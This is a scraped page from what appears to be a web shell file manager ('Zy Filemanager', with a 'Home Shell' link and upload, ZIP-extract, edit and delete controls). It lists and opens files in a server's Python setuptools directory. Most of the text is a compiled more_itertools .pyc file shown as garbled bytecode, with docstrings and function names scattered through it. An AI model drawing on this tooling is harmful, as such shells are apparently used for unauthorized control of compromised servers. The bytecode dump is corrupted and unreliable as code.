⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
alt
/
python39
/
lib
/
python3.9
/
site-packages
/
setuptools
/
_vendor
/
more_itertools
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-39.pyc
(317 bytes)
317 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
more.cpython-39.pyc
(110,062 bytes)
107.48 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
recipes.cpython-39.pyc
(17,982 bytes)
17.56 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: recipes.cpython-39.pyc
File: /opt/alt/python39/lib/python3.9/site-packages/setuptools/_vendor/more_itertools/__pycache__/recipes.cpython-39.pyc
Size: 17.56 KB | Last Modified: 2023-11-14 04:50:33
💾 Backup File
🔢 Toggle Line Numbers
a (�Re�? � @ s� d Z ddlZddlmZ ddlmZmZmZmZm Z m Z mZmZm Z mZ ddlZddlmZmZmZ g d�Zdd� ZdDd d �Zdd� ZdEd d�ZdFdd�Zdd� Zefdd�Zdd� ZeZdd� Zdd� Z dd� Z!dGdd�Z"dd � Z#zdd!lm$Z% W n e&�y e#Z$Y n0 d"d#� Z$e#j e$_ dHd$d%�Z'd&d'� Z(d(d)� Z)d*d+� Z*dId,d-�Z+dJd.d/�Z,dKd0d1�Z-dLd2d3�Z.d4d5�d6d7�Z/dMd8d9�Z0d:d;� Z1d<d=� Z2d>d?� Z3d@dA� Z4dBdC� Z5dS )Na Imported from the recipes section of the itertools documentation. All functions taken from the recipes section of the itertools library docs [1]_. Some backward-compatible usability improvements have been made. .. [1] http://docs.python.org/library/itertools.html#recipes � N)�deque) �chain�combinations�count�cycle�groupby�islice�repeat�starmap�tee�zip_longest)� randrange�sample�choice)� all_equal�consume�convolve� dotproduct� first_true�flatten�grouper�iter_except�ncycles�nth�nth_combination�padnone�pad_none�pairwise� partition�powerset�prepend�quantify�#random_combination_with_replacement�random_combination�random_permutation�random_product� repeatfunc� roundrobin�tabulate�tail�take�unique_everseen�unique_justseenc C s t t|| ��S )z�Return first *n* items of the iterable as a list. >>> take(3, range(10)) [0, 1, 2] If there are fewer than *n* items in the iterable, all of them are returned. >>> take(10, range(3)) [0, 1, 2] )�listr ��n�iterable� r1 ��/builddir/build/BUILDROOT/alt-python39-setuptools-58.3.0-2.el8.x86_64/opt/alt/python39/lib/python3.9/site-packages/setuptools/_vendor/more_itertools/recipes.pyr* <